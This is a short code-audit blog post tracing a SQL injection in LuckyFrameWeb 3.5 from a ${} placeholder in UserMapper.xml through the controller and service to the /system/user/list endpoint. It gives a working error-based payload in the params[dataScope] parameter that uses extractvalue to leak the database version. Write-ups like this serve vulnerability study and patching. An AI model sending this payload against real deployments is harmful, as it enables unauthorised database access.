luckyframeweb3.5 sql inject 3

src/main/resources/mybatis/system/UserMapper.xml

There is a ${} in this mapper

Search selectUserList to see where the this select id is used：

UserController.java

Query user information：

Follow up the selectUserList method to see the specific implementation：

UserServiceImpl.java

The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:

Splice URL and parameters according to code:

1
2
3


http://127.0.0.1/system/user/list
params[dataScope]=

Use error injection to query the database version：

1 2	`params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))`

Select database name:

代码审计

java代码审计

声明：
本文章用于学习交流，严禁用于非法操作，出现后果一切自行承担，阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.

flex反序列化原理及利用链构造上一篇

luckyframeweb3.5 sql inject 2 下一篇